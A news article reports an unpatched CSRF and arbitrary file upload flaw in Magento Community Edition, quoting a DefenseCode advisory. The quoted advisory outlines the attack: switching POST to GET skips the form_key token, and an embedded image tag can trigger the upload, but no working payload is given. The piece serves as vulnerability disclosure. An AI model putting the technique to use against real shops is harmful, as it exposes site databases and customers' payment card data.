There is a serious vulnerability in a version of the Magento e-commerce platform that could allow a remote attacker to access a target site’s database.
The bug can be used for remote code execution, and the researchers who discovered it say they notified Magento of the vulnerability in November, but the company hasn’t released a fix yet. Magento’s platform is used by hundreds of thousands of sites for a variety of e-commerce functions. An attacker who successfully exploits the vulnerability could get access to whatever is stored in a compromised site’s database, such as payment card data.
The flaw is a cross-site request forgery issue and allows for the upload of arbitrary files.
“By changing the request method from POST to GET, a lack of a form_key parameter which serves as a CSRF token will be ignored and thus enable cross-site request forgery (CSRF) attacks. The attack can be constructed as simple as <img src=… in an email or a public message board, which will automatically trigger the arbitrary file upload if a user is currently logged into Magento. An attacker can also entice the user to open a CSRF link using social engineering,” the advisory from DefenseCode says.
In addition to the remote code execution attack vector, a local user could exploit this vulnerability through the admin panel. The user would not need any special privileges to do this.
“Full administrative access is not required to exploit this vulnerability as any Magento administrative panel user regardless of assigned roles and permissions can access the remote image retrieval functionality. Therefore, gaining a low privileged access can enable the attacker to compromise the whole system or at very least, the database,” the advisory says.
This vulnerability affects the Community Edition release of Magento, which is an open source version meant for small businesses and developers.
Image: Guilherme Tavares, CC By license.